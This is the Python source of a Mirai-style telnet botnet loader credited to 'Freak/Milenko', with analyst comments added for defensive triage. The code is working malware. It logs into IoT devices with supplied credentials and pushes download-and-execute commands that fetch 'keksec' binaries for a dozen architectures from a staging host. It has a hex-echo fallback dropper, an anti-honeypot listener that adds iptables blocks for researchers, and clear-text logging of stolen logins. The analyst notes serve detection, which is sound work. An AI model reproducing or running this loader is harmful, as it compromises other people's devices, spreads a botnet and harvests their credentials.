- #!/usr/bin/python
- #Phaaaat hax telnet loader by Freak/Milenko
- #this loader actively detects honeypots using incorrect user agents when requesting bins.
- #it will actively block any detected honeypot with iptables.
- #USAGE(S):
- #ANTI HONEYPOT MODE:
- #cat list.txt | python loader.py 1 8081
- #DUMBASS MODE
- #cat list.txt | python loader.py 0
- #SELFREP MODE (recommended) configure capsaicin for scanlisten port
- #ncat -kvlp scanlistenport | python loader.py 1 8081
- # ANALYST NOTE (defensive triage): Python 2 telnet credential loader. It reads
- # ip/username/password entries from stdin (parsed in check()), logs in over telnet
- # in infect(), and pushes a multi-architecture dropper to the device.
- # Indicators that appear literally in this file:
- #   * HTTP fetches of <binprefix>.<arch> for mips, mpsl, sh4, x86, arm7, x64, ppc,
- #     i586, m68k, spc, arm, arm5 and ppc-440fp, each followed by chmod 777, execute, rm -f
- #   * the shell probe echo -e '\x41\x4b\x34\x37' (prints AK47) sent right after login
- #   * files named .keksec and updDl written on the device
- #   * the string CAPSAICIN, which infect() searches for in device output
- #     (presumably printed by the payload once it runs - confirm against the binary)
- #   * operator-side files: bots.txt, infected.txt and echoes.txt hold
- #     "ip:23 user:pass" in clear text; honeypots.txt holds blocklisted IPs
- import sys, re, os, socket, time, select,sys
- from threading import Thread
- # Staging host embedded in every download command built below. "1.3.3.7" looks
- # like a placeholder left by the author - TODO confirm; in a deployed copy this
- # value is the primary network indicator.
- serverip = "1.3.3.7"
- # URL path prefix of the payloads; binname is its last path component ("keksec").
- binprefix = "/bins/keksec"
- binname = binprefix.split("/")[-1]
- rekdevice = """cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
- cd /tmp || cd $(find / -writable | head -n 1);
- wget http://""" + serverip + binprefix + """.mips -O keksec.mips; busybox wget http://""" + serverip + binprefix + """.mips -O keksec.mips; chmod 777 """ + binname + """.mips; ./""" + binname + """.mips; rm -f """ + binname + """.mips
- wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; busybox wget http://""" + serverip + binprefix + """.mpsl -O keksec.mpsl; chmod 777 """ + binname + """.mpsl; ./""" + binname + """.mpsl; rm -f """ + binname + """.mpsl
- wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; busybox wget http://""" + serverip + binprefix + """.sh4 -O keksec.sh4; chmod 777 """ + binname + """.sh4; ./""" + binname + """.sh4; rm -f """ + binname + """.sh4
- wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; busybox wget http://""" + serverip + binprefix + """.x86 -O keksec.x86; chmod 777 """ + binname + """.x86; ./""" + binname + """.x86; rm -f """ + binname + """.x86
- wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; busybox wget http://""" + serverip + binprefix + """.arm7 -O keksec.arm7; chmod 777 """ + binname + """.arm7; ./""" + binname + """.arm7; rm -f """ + binname + """.arm7
- wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; busybox wget http://""" + serverip + binprefix + """.x64 -O keksec.x64; chmod 777 """ + binname + """.x64; ./""" + binname + """.x64; rm -f """ + binname + """.x64
- wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; busybox wget http://""" + serverip + binprefix + """.ppc -O keksec.ppc; chmod 777 """ + binname + """.ppc; ./""" + binname + """.ppc; rm -f """ + binname + """.ppc
- wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; busybox wget http://""" + serverip + binprefix + """.i586 -O keksec.i586; chmod 777 """ + binname + """.i586; ./""" + binname + """.i586; rm -f """ + binname + """.i586
- wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; busybox wget http://""" + serverip + binprefix + """.m68k -O keksec.m68k; chmod 777 """ + binname + """.m68k; ./""" + binname + """.m68k; rm -f """ + binname + """.m68k
- wget http://""" + serverip + binprefix + """.spc -O keksec.spc; busybox wget http://""" + serverip + binprefix + """.spc -O keksec.spc; chmod 777 """ + binname + """.spc; ./""" + binname + """.spc; rm -f """ + binname + """.spc
- wget http://""" + serverip + binprefix + """.arm -O keksec.arm; busybox wget http://""" + serverip + binprefix + """.arm -O keksec.arm; chmod 777 """ + binname + """.arm; ./""" + binname + """.arm; rm -f """ + binname + """.arm
- wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; busybox wget http://""" + serverip + binprefix + """.arm5 -O keksec.arm5; chmod 777 """ + binname + """.arm5; ./""" + binname + """.arm5; rm -f """ + binname + """.arm5
- wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; busybox wget http://""" + serverip + binprefix + """.ppc-440fp -O keksec.ppc-440fp; chmod 777 """ + binname + """.ppc-440fp; ./""" + binname + """.ppc-440fp; rm -f """ + binname + """.ppc-440fp"""
- rekdevice = rekdevice.replace("\r", "").split("\n")
- global fh
- fh = open("bots.txt","a+")
- def chunkify(lst,n):
- return [ lst[i::n] for i in xrange(n) ]
- running = 0
- global echo
- global tftp
- global wget
- global logins
- global echoed
- echoed = []
- tftp = 0
- wget = 0
- echo = 0
- logins = 0
- ran = 0
- def printStatus():
- global echo
- global tftp
- global wget
- global logins
- global ran
- while 1:
- time.sleep(5)
- print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + " Ran:" + str(ran) + " Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
- def readUntil(tn, advances, timeout=8):
- buf = ''
- start_time = time.time()
- while time.time() - start_time < timeout:
- buf += tn.recv(1024)
- time.sleep(0.1)
- for advance in advances:
- if advance in buf: return buf
- return ""
- def recvTimeout(sock, size, timeout=8):
- sock.setblocking(0)
- ready = select.select([sock], [], [], timeout)
- if ready[0]:
- data = sock.recv(size)
- return data
- return ""
- def contains(data, array):
- for test in array:
- if test in data:
- return True
- return False
- def split_bytes(s, n):
- assert n >= 4
- start = 0
- lens = len(s)
- while start < lens:
- if lens - start <= n:
- yield s[start:]
- return # StopIteration
- end = start + n
- assert end > start
- yield s[start:end]
- start = end
- global badips
- badips=[]
- def fileread():
- fh=open("honeypots.txt", "rb")
- data=fh.read()
- fh.close()
- return data
- # ANALYST NOTE: per-connection handler for the anti-honeypot listener.
- # It reads up to 8912 bytes of the client's request and looks for the substrings
- # "curl" or "Wget" anywhere in it. A request containing neither is treated as a
- # honeypot or researcher: the source IP is appended to honeypots.txt, an
- # iptables INPUT DROP rule is added for it, and it is added to badips (infect()
- # returns early for addresses in badips).
- # Both branches then send the same taunt line followed by 10 bursts of
- # 65535*2 random bytes, so this port never serves a real binary.
- # Defensive takeaway: sample-retrieval tooling that follows the callback URL with
- # its own HTTP client is blocklisted and receives junk; the blocklist itself
- # (honeypots.txt plus iptables rules) is an artifact worth collecting on a seized host.
- def clientHandler(c, addr):
- global badips
- try:
- # Addresses already blocklisted in memory or in honeypots.txt are ignored
- # (the connection is still closed below).
- if addr[0] not in badips and addr[0] not in fileread():
- print addr[0] + ":" + str(addr[1]) + " has connected!"
- request = recvTimeout(c, 8912)
- if "curl" not in request and "Wget" not in request:
- if addr[0] not in fileread():
- fh=open("honeypots.txt", "a")
- fh.write(addr[0]+"\n")
- fh.close()
- # addr[0] comes from accept(), i.e. the peer address of the TCP connection.
- os.popen("iptables -A INPUT -s " + addr[0] + " -j DROP")
- badips.append(addr[0])
- print addr[0] + ":" + str(addr[1]) + " is a fucking honeypot!!!"
- c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
- for i in range(10):
- c.send(os.urandom(65535*2))
- else:
- c.send("fuck you GOOF HONEYPOT GET OUT\r\n")
- for i in range(10):
- c.send(os.urandom(65535*2))
- c.close()
- # Every error is swallowed, so the handler leaves no trace of failures.
- except Exception as e:
- #print str(e)
- pass
- # ANALYST NOTE: TCP listener for the anti-honeypot callback. It binds to all
- # interfaces ('') on honeyport and hands every accepted connection to
- # clientHandler in its own thread. It is only started when argv[1] is "1"
- # (see the statement following this function), with argv[2] as the port.
- def honeyserver(honeyport):
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- s.bind(('', honeyport))
- s.listen(999999999)
- while 1:
- try:
- c, addr = s.accept()
- Thread(target=clientHandler, args=(c, addr,)).start()
- # accept/thread errors are ignored and the loop keeps running
- except:
- pass
- if sys.argv[1]=="1":
- Thread(target=honeyserver, args=(int(sys.argv[2]),)).start()
- # ANALYST NOTE: core routine - logs in to one device over telnet with the given
- # credentials and attempts to install a payload. The comments below mark the
- # stages that are observable in telnet session captures or on the device, for use
- # in detection and incident response. Returns None on every path; results are
- # reported through the global counters, console output and the log files.
- def infect(ip, username, password):
- global badips
- global echo
- global tftp
- global wget
- global logins
- global ran
- global echoed
- # Devices already handled by the echo-load stage are skipped.
- if ip in echoed:
- return
- # String searched for in device output to decide that a payload is running.
- infectedkey = "CAPSAICIN"
- try:
- tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- tn.settimeout(1)
- # Raw TCP connection to telnet on port 23, 1 second timeout.
- tn.connect((ip, 23))
- except:
- try:
- tn.close()
- except:
- pass
- return
- try:
- # Login stage: wait for a ":" prompt, send the username, wait for another ":"
- # prompt, send the password, then read the banner/prompt that follows.
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(username + "\n")
- time.sleep(0.1)
- hoho = ''
- hoho += readUntil(tn, ":")
- if ":" in hoho:
- tn.send(password + "\n")
- time.sleep(0.8)
- else:
- pass
- prompt = ''
- prompt += recvTimeout(tn, 8192)
- # A shell-like prompt character (#, $, @ or >) is taken as a successful login.
- if ">" in prompt and "ONT" not in prompt:
- success = True
- elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
- success = True
- else:
- tn.close()
- return
- except:
- tn.close()
- return
- if success == True:
- try:
- # DETECTION: the fixed sequence enable / system / shell / sh followed by
- # echo -e '\x41\x4b\x34\x37' arrives back-to-back right after authentication.
- # This burst is a strong signature in telnet session logs.
- tn.send("enable\r\n")
- tn.send("system\r\n")
- tn.send("shell\r\n")
- tn.send("sh\r\n")
- tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
- except:
- tn.close()
- return
- time.sleep(1)
- try:
- buf = recvTimeout(tn, 8192)
- except:
- tn.close()
- return
- # "AK47" in the reply means the device interpreted the escapes, i.e. a real shell answered.
- if "AK47" in buf:
- if sys.argv[1] == "1":
- # Anti-honeypot callback: the device is told to fetch /bins/mirai.arm from
- # serverip on the listener port (argv[2]). clientHandler inspects that
- # request; if it blocklists the caller, the ip appears in badips and this
- # function stops before logging or dropping anything.
- tn.send("wget http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
- tn.send("curl http://" +serverip + ":" + sys.argv[2] + "/bins/mirai.arm &\r\n");
- time.sleep(3)
- recvTimeout(tn, 8192)
- if ip in badips:
- return
- print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- logins += 1
- # IR: working credentials are appended to bots.txt in clear text.
- fh.write(ip + ":23 " + username + ":" + password + "\n")
- fh.flush()
- # Dropper stage: every line of rekdevice (cd to a writable directory, then
- # wget / busybox wget, chmod 777, execute, rm -f per architecture) is sent.
- for rek in rekdevice:
- tn.send(rek + "\r\n")
- time.sleep(3)
- buf = recvTimeout(tn, 1024*1024)
- loaded = False
- # Outcome is inferred from substrings in the device output ("bytes", "saved").
- if "bytes" in buf:
- print "\033[32m[\033[31m+\033[32m] \033[33mwget \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- tftp += 1
- loaded = True
- elif "saved" in buf:
- print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- wget += 1
- loaded = True
- if infectedkey in buf:
- ran += 1
- print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- # IR: infected.txt lists devices whose output contained the infection key.
- f=open("infected.txt", "a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- #if loaded:
- # tn.close()
- # return
- # Fallback stage for devices without a usable downloader.
- # DETECTION: reads of /proc/mounts followed by write/read/delete of a file
- # named .keksec on each read-write mount.
- tn.send("cd /tmp ; cd /home/$USER ; cd /var/run ; cd /mnt ; cd /root ; cd /\r\n")
- tn.send("cat /proc/mounts;busybox cat /proc/mounts\r\n")
- mounts = recvTimeout(tn, 1024*1024)
- for line in mounts.split("\n"):
- try:
- path = line.split(" ")[1]
- if " rw" in line:
- tn.send("echo -e '%s' > %s/.keksec; cat %s/.keksec;busybox cat %s/.keksec; rm %s/.keksec;busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
- if "AK47" in recvTimeout(tn, 1024*1024):
- tn.send("cd %s\r\n" % path) #cd into the writeable directory
- except:
- continue
- # DETECTION: a local stub from bins/dlr.<arch> is transferred as hex-escaped
- # 128-byte chunks via repeated echo -ne '...' > / >> updDl commands, then
- # chmod 777 updDl and ./updDl. Long runs of echo -ne with \x escapes appended
- # to one file are distinctive in session logs and shell auditing.
- for binary in "dlr.arm dlr.arm7 dlr.mips dlr.x86 dlr.mpsl dlr.m68k dlr.sh4 dlr.ppc dlr.spc".split(" "):
- try:
- first = True
- count = 0
- hexdata = []
- for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
- hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
- parts = len(hexdata)
- for hexchunk in hexdata:
- seq = ">" if first else ">>"
- tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")#;busybox echo -ne '" + hexchunk + "' " + seq + "\r\n")
- first = False
- count += 1
- time.sleep(0.01)
- print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
- tn.send("chmod 777 updDl;busybox chmod 777 updDl\r\n")
- tn.send("./updDl\r\n")
- time.sleep(5)
- tn.send("rm -rf ./updDl\r\n")
- time.sleep(0.1)
- # Second-stage file name expected to be left behind by the stub; it is run
- # and then deleted, so it may only exist briefly on disk.
- tn.send("./gsdfsdf424r24\r\n") #change this to dvrHelper if using mirai
- time.sleep(1)
- tn.send("rm -rf ./gsdfsdf424r24\r\n") #and this
- buf = recvTimeout(tn, 1024*1024)
- # "FIN" in the output is treated as confirmation that the stub completed.
- if "FIN" in buf:
- echo += 1
- print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
- tn.close()
- # IR: echoes.txt lists devices loaded through the echo path.
- f=open("echoes.txt","a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- echoed.append(ip)
- if infectedkey in buf:
- ran += 1
- f=open("infected.txt", "a")
- f.write(ip +":23 " + username + ":" + password + "\r\n")
- f.close()
- print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
- tn.close()
- return
- except Exception as e:
- # print str(e)
- return
- else:
- # tn.close()
- return
- def check(chunk, fh):
- global running
- running += 1
- threadID = running
- for login in chunk:
- try:
- port = 23
- if ":23 " in login:
- login = login.replace(":23 ", ":")
- port = 23
- if ":2323 " in login:
- login = login.replace(":2323 ", ":")
- port = 2323
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.settimeout(1)
- try:
- socket.inet_aton(login.split(":")[0])
- ip = login.split(":")[0]
- username = login.split(":")[1]
- password = login.split(":")[2]
- except:
- try:
- socket.inet_aton(login.split(":")[2])
- ip = login.split(":")[2]
- username = login.split(":")[0]
- password = login.split(":")[1]
- except:
- continue
- s.connect((ip, port))
- s.close()
- infect(ip, username, password)
- except:
- pass
- running -= 1
- while 1:
- if running >= 512:
- time.sleep(0.3)
- try:
- Thread(target = check, args = ([raw_input()], fh,)).start()
- except KeyboardInterrupt:
- os.kill(os.getpid(), 9)
- except Exception:
- pass